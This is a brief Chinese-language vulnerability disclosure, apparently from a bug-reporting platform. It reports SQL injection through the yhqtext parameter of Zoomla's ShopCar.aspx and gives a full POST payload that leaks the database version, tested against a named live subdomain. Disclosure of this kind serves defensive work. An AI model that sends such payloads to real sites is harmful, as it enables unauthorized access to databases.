### 简要描述: RT ### 详细说明: [<img src="https://images.seebug.org/upload/201405/11164349a794c0f8ca56a0da962591314c69c598.jpg" alt="QQ图片20140511164417.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/11164349a794c0f8ca56a0da962591314c69c598.jpg) 官网的备份RAR下载中获得ShopCar.aspx文件,yhqtext参数过滤不严导致注入。 POST数据包. ``` __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKMTkzMDY3NjYwOGRk6%2FTSo2pywhEJXAcamziGHTiH1Mo%3D&yhqtext=1%27and%2B1%3D%28select%2B%40%40version%29--&yhqpwd=1&Button1=%E5%8E%BB%E6%94%B6%E9%93%B6%E5%8F%B0%E7%BB%93%E5%B8%90&project=&jifen=&ProClass=&projuct=&Stock=&GuestName=&comedate=&GuestMobile=&cityname=&preID=&Type= ``` ### 漏洞证明: 以旗下分站测试:Url:http://sc.zoomla.cn/ShopCar.aspx [<img src="https://images.seebug.org/upload/201405/11164530688d18c7d0f8e9091d1918ed51c1f58a.jpg" alt="QQ图片20140511164604.jpg" width="600"...
### 简要描述: RT ### 详细说明: [<img src="https://images.seebug.org/upload/201405/11164349a794c0f8ca56a0da962591314c69c598.jpg" alt="QQ图片20140511164417.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/11164349a794c0f8ca56a0da962591314c69c598.jpg) 官网的备份RAR下载中获得ShopCar.aspx文件,yhqtext参数过滤不严导致注入。 POST数据包. ``` __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKMTkzMDY3NjYwOGRk6%2FTSo2pywhEJXAcamziGHTiH1Mo%3D&yhqtext=1%27and%2B1%3D%28select%2B%40%40version%29--&yhqpwd=1&Button1=%E5%8E%BB%E6%94%B6%E9%93%B6%E5%8F%B0%E7%BB%93%E5%B8%90&project=&jifen=&ProClass=&projuct=&Stock=&GuestName=&comedate=&GuestMobile=&cityname=&preID=&Type= ``` ### 漏洞证明: 以旗下分站测试:Url:http://sc.zoomla.cn/ShopCar.aspx [<img src="https://images.seebug.org/upload/201405/11164530688d18c7d0f8e9091d1918ed51c1f58a.jpg" alt="QQ图片20140511164604.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/11164530688d18c7d0f8e9091d1918ed51c1f58a.jpg) 很明显的报错啦,有防注入,很容易就绕过了。
